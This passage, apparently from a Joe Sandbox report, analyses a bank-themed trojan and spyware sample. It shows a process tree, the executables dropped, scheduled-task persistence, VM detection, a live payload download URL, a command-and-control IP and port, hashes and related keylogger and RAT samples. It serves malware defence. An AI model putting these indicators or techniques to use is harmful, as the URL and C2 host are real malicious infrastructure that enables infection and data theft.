dropped 126 Multi AV Scanner detection for dropped file 43->126 128 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 43->128 130 Machine Learning detection for dropped file 43->130 134 4 other signatures 43->134 54 regasms.exe 8 43->54         started        57 powershell.exe 23 43->57         started        60 schtasks.exe 1 43->60         started        132 Loading BitLocker PowerShell Module 47->132 62 conhost.exe 47->62         started        64 WmiPrvSE.exe 47->64         started        100 185.208.158.187, 4449, 49756 SIMPLECARRER2IT Switzerland 49->100 66 cmd.exe 49->66         started        68 conhost.exe 52->68         started        file14 signatures15 process16 file17 94 C:\Users\user\AppData\...94otepadUpdate.exe, PE32 54->94 dropped 70 cmd.exe 54->70         started        72 cmd.exe 54->72         started        124 Loading BitLocker PowerShell Module 57->124 74 conhost.exe 57->74         started        76 conhost.exe 60->76         started        78 conhost.exe 66->78         started        80 schtasks.exe 66->80         started        signatures18 process19 process20 82 conhost.exe 70->82         started        84 timeout.exe 70->84         started        86 NotepadUpdate.exe 70->86         started        88 conhost.exe 72->88         started        90 schtasks.exe 72->90         started       

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Ziraat Bankasi Swift Mesaji.dqy.dll37%ReversingLabsWin64.Trojan.Generic
                  Ziraat Bankasi Swift Mesaji.dqy.dll100%AviraHEUR/AGEN.1323336
                  Ziraat Bankasi Swift Mesaji.dqy.dll100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\regasms.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\NotepadUpdate.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe26%ReversingLabs
                  C:\Users\user\AppData\Roaming\NotepadUpdate.exe26%ReversingLabs
                  C:\Users\user\AppData\Roaming\regasms.exe26%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://52575815-38-20200406120634.webstarterz.com/EpWHRWboolCJUXe.exe100%Avira URL Cloudmalware
                  https://52575815-38-20200406120634.webstarterz.com:443/EpWHRWboolCJUXe.exe100%Avira URL Cloudmalware
                  https://52575815-38-20200406120634.webstarterz.com/100%Avira URL Cloudmalware

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  52575815-38-20200406120634.webstarterz.com
                  		163.44.198.57
                  		truefalse
                    		high
                    bg.microsoft.map.fastly.net
                    		199.232.214.172
                    		truefalse
                      		high
                      default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
                      		217.20.58.98
                      		truefalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://52575815-38-20200406120634.webstarterz.com/EpWHRWboolCJUXe.exetrue
                        • Avira URL Cloud: malware
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://52575815-38-20200406120634.webstarterz.com/rundll32.exe, 00000005.00000002.1365084163.0000022E795E2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392563958.0000025438CD7000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://52575815-38-20200406120634.webstarterz.com:443/EpWHRWboolCJUXe.exerundll32.exe, 00000005.00000002.1365084163.0000022E795E2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392563958.0000025438CE2000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameregasms.exe, 0000000D.00000002.1403401343.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 0000000F.00000002.1440771055.0000000003121000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 00000014.00000002.1535778393.0000000002C5D000.00000004.00000800.00020000.00000000.sdmp, AtkzppDHiyvcIR.exe, 00000015.00000002.1540173205.0000000002851000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 0000001B.00000002.3725431578.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 0000001B.00000002.3725431578.0000000003133000.00000004.00000800.00020000.00000000.sdmp, NotepadUpdate.exe, 00000028.00000002.1574426924.0000000003141000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://www.chiark.greenend.org.uk/~sgtatham/putty/0rundll32.exe, 00000005.00000002.1365084163.0000022E79661000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1364433339.000000344ECEB000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1365084163.0000022E795B8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392342926.000000FEF1D3B000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392563958.0000025438D63000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392563958.0000025438CD7000.00000004.00000020.00020000.00000000.sdmp, regasms.exe, 00000014.00000002.1543912182.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, regasms.exe.5.dr, AtkzppDHiyvcIR.exe.13.dr, NotepadUpdate.exe.20.drfalse
                            		high

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            163.44.198.57
                            		52575815-38-20200406120634.webstarterz.comSingapore
                            		135161GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSGfalse
                            185.208.158.187
                            		unknownSwitzerland
                            		34888SIMPLECARRER2ITtrue

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1572391
                            Start date and time:2024-12-10 14:20:40 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 11m 6s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:48
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:Ziraat Bankasi Swift Mesaji.dqy.dll
                            (renamed file extension from exe to dll)
                            Original Sample Name:Ziraat Bankasi Swift Mesaji.dqy.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winDLL@58/22@2/2
                            EGA Information:
                            • Successful, ratio: 87.5%
                            HCA Information:
                            • Successful, ratio: 97%
                            • Number of executed functions: 366
                            • Number of non-executed functions: 10
                            Cookbook Comments:
                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 217.20.58.98, 23.193.114.26, 23.193.114.18, 13.107.246.63, 23.36.245.152, 20.12.23.50
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, time.windows.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
                            • Execution Graph export aborted for target rundll32.exe, PID 5776 because there are no executed function
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtCreateKey calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • VT rate limit hit for: Ziraat Bankasi Swift Mesaji.dqy.dll

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            08:21:38API Interceptor1x Sleep call for process: loaddll64.exe modified
                            08:21:44API Interceptor7047743x Sleep call for process: regasms.exe modified
                            08:21:48API Interceptor39x Sleep call for process: powershell.exe modified
                            08:21:53API Interceptor25x Sleep call for process: AtkzppDHiyvcIR.exe modified
                            09:29:16API Interceptor2x Sleep call for process: NotepadUpdate.exe modified
                            14:21:50Task SchedulerRun new task: AtkzppDHiyvcIR path: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe
                            15:29:16Task SchedulerRun new task: NotepadUpdate path: "C:\Users\user\AppData\Roaming\NotepadUpdate.exe"

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            163.44.198.57Payment Confirmation..docmGet hashmaliciousSnake KeyloggerBrowse
                            • 52575815-38-20200406120634.webstarterz.com/pSRrNpLv0bS37RA.exe
                            PO#2207008 .docmGet hashmaliciousSnake KeyloggerBrowse
                            • 52575815-38-20200406120634.webstarterz.com/nawBVBlSWH7iu7T.scr
                            185.208.158.187file.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                              file.exeGet hashmaliciousAsyncRAT, VenomRATBrowse

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                52575815-38-20200406120634.webstarterz.comPrice Quotation-01.dqy.dllGet hashmaliciousSnake KeyloggerBrowse
                                • 163.44.198.57
                                Payment Confirmation..docmGet hashmaliciousSnake KeyloggerBrowse
                                • 163.44.198.57
                                PO#2207008 .docmGet hashmaliciousSnake KeyloggerBrowse
                                • 163.44.198.57
                                default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comfile.exeGet hashmaliciousCredential FlusherBrowse
                                • 217.20.58.98
                                8jH2JH42wS.exeGet hashmaliciousUnknownBrowse
                                • 217.20.58.101
                                Marsha Rowland Signature Required.pdfGet hashmaliciousUnknownBrowse
                                • 217.20.58.100
                                Rfq_po_december_purchase_list_details_specifications_09_12_2024_0000000000.vbsGet hashmaliciousUnknownBrowse
                                • 217.20.58.100
                                https://reader.egress.com/remote.aspx/s/storage.phe.gov.uk/email/e0599f812894d1904a8fe3cf7f605bcbGet hashmaliciousUnknownBrowse
                                • 217.20.58.101
                                Msig Insurance Europe.pdfGet hashmaliciousUnknownBrowse
                                • 217.20.58.101
                                IobqEI79aH.exeGet hashmaliciousUnknownBrowse
                                • 217.20.58.99
                                hra33.dllGet hashmaliciousNitolBrowse
                                • 217.20.58.98
                                file.exeGet hashmaliciousQuasarBrowse
                                • 217.20.58.100
                                spoolsv.exeGet hashmaliciousRedLine, StormKitty, XWormBrowse
                                • 217.20.58.100
                                bg.microsoft.map.fastly.netPrice Quotation-01.dqy.dllGet hashmaliciousSnake KeyloggerBrowse
                                • 199.232.214.172
                                New Order Enquiry.jsGet hashmaliciousAgentTeslaBrowse
                                • 199.232.214.172
                                E-dekont.exeGet hashmaliciousMassLogger RATBrowse
                                • 199.232.210.172
                                Rep_ort2024Dec9.pdfGet hashmaliciousCaptcha PhishBrowse
                                • 199.232.210.172
                                PO. A-72 9234567.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                • 199.232.214.172
                                c2.htaGet hashmaliciousXWormBrowse
                                • 199.232.210.172
                                SC3sPWT51E.exeGet hashmaliciousLummaC StealerBrowse
                                • 199.232.214.172
                                file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                • 199.232.214.172
                                OrderSheet.xla.xlsxGet hashmaliciousUnknownBrowse
                                • 199.232.210.172
                                file.exeGet hashmaliciousStealcBrowse
                                • 199.232.210.172

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSGPrice Quotation-01.dqy.dllGet hashmaliciousSnake KeyloggerBrowse
                                • 163.44.198.57
                                Payment Confirmation..docmGet hashmaliciousSnake KeyloggerBrowse
                                • 163.44.198.57
                                PO#2207008 .docmGet hashmaliciousSnake KeyloggerBrowse
                                • 163.44.198.57
                                GRAINS.vbsGet hashmaliciousAgentTeslaBrowse
                                • 163.44.198.71
                                Halkbank_Ekstre.exeGet hashmaliciousAgentTeslaBrowse
                                • 163.44.198.71
                                https://t.ly/UEfhCGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                • 163.44.198.45
                                PRODUCT-PICTURE.batGet hashmaliciousAgentTeslaBrowse
                                • 163.44.198.71
                                ilZhNx3JAc.batGet hashmaliciousAgentTeslaBrowse
                                • 163.44.198.71
                                87M9Y3P4Z7.batGet hashmaliciousAgentTeslaBrowse
                                • 163.44.198.71
                                https://chilltalk.co.th/sg/societalgenerale/Get hashmaliciousUnknownBrowse
                                • 163.44.198.45
                                SIMPLECARRER2ITfile.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                                • 185.208.158.187
                                file.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                                • 185.208.158.187
                                lLNOwu1HG4.jsGet hashmaliciousRHADAMANTHYSBrowse
                                • 185.196.8.68
                                file.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                • 185.196.8.239
                                stail.exeGet hashmaliciousSocks5SystemzBrowse
                                • 185.208.158.202
                                getlab.exeGet hashmaliciousSocks5SystemzBrowse
                                • 185.208.158.202
                                chutmarao.ps1Get hashmaliciousRHADAMANTHYSBrowse
                                • 185.196.8.68
                                RjygH3Vh7O.exeGet hashmaliciousRHADAMANTHYSBrowse
                                • 185.196.8.68
                                SekpL8Z26C.exeGet hashmaliciousUnknownBrowse
                                • 185.208.159.79
                                file.exeGet hashmaliciousUnknownBrowse
                                • 185.208.159.79

                                JA3 Fingerprints

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                a0e9f5d64349fb13191bc781f81f42e1Price Quotation-01.dqy.dllGet hashmaliciousSnake KeyloggerBrowse
                                • 163.44.198.57
                                Z9lFNBiLGK.exeGet hashmaliciousDBatLoaderBrowse
                                • 163.44.198.57
                                Z9lFNBiLGK.exeGet hashmaliciousDBatLoaderBrowse
                                • 163.44.198.57
                                https://ytfjghloadv1.b-cdn.net/proCESSINGveriffv001.htmlGet hashmaliciousCAPTCHA Scam ClickFix, LummaC StealerBrowse
                                • 163.44.198.57
                                file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRATBrowse
                                • 163.44.198.57
                                file.exeGet hashmaliciousLummaC StealerBrowse
                                • 163.44.198.57
                                nanophanotool.exeGet hashmaliciousLummaC StealerBrowse
                                • 163.44.198.57
                                file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                • 163.44.198.57
                                file.exeGet hashmaliciousLummaC StealerBrowse
                                • 163.44.198.57
                                sjoslin@odeonuk.com_print.svgGet hashmaliciousUnknownBrowse
                                • 163.44.198.57

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                Download File
                                Process:C:\Users\user\AppData\Roaming\regasms.exe
                                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                Category:dropped
                                Size (bytes):71954
                                Entropy (8bit):7.996617769952133
                                Encrypted:true
                                SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                Malicious:false
                                Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                Download File
                                Process:C:\Users\user\AppData\Roaming\regasms.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):328
                                Entropy (8bit):3.132195944836352
                                Encrypted:false
                                SSDEEP:6:kKBL9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:JiDnLNkPlE99SNxAhUe/3
                                MD5:395847444B6B57B5882C93A7D7C998D5
                                SHA1:D99B9E30A0D42740761D54C86CDBBB382238EE24
                                SHA-256:3922A37049163C712493CEA14A7C6C9BFA1EE02353967F69A00397481EF9AE8A
                                SHA-512:AE9D7F40081B842AE1BE071B95A1ED709DB435736AC892E233C08E65D55F0ADB27B7378E31FB109192EAEDB05F62EF9A75B8C9FF688B4278ED129971AD6A7349
                                Malicious:false
                                Preview:p...... .........^s..K..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AtkzppDHiyvcIR.exe.log

                                Download File
                                Process:C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1415
                                Entropy (8bit):5.352427679901606
                                Encrypted:false
                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
                                MD5:97AD91F1C1F572C945DA12233082171D
                                SHA1:D5E33DDAB37E32E416FC40419FB26B3C0563519D
                                SHA-256:3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
                                SHA-512:8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
                                Malicious:false
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\regasms.exe.log

                                Download File
                                Process:C:\Users\user\AppData\Roaming\regasms.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1415
                                Entropy (8bit):5.352427679901606
                                Encrypted:false
                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
                                MD5:97AD91F1C1F572C945DA12233082171D
                                SHA1:D5E33DDAB37E32E416FC40419FB26B3C0563519D
                                SHA-256:3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
                                SHA-512:8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
                                Malicious:false
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc

                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2232
                                Entropy (8bit):5.380805901110357
                                Encrypted:false
                                SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:lGLHyIFKL3IZ2KRH9Oug8s
                                MD5:16AD599332DD2FF94DA0787D71688B62
                                SHA1:02F738694B02E84FFE3BAB7DE5709001823C6E40
                                SHA-256:452876FE504FC0DBEDBD7F8467E94F6E80002DB4572D02C723ABC69F8DF0B367
                                SHA-512:A96158FDFFA424A4AC01220EDC789F3236C03AAA6A7C1A3D8BE62074B4923957E6CFEEB6E8852F9064093E0A290B0E56E4B5504D18113A7983F48D5388CEC747
                                Malicious:false
                                Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1crkr23n.t2a.ps1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1rislh22.saw.psm1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5lv3spji.4sz.psm1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cb44rgov.bu5.psm1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eyicmtni.sn1.psm1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k1vvx0dd.ybr.ps1

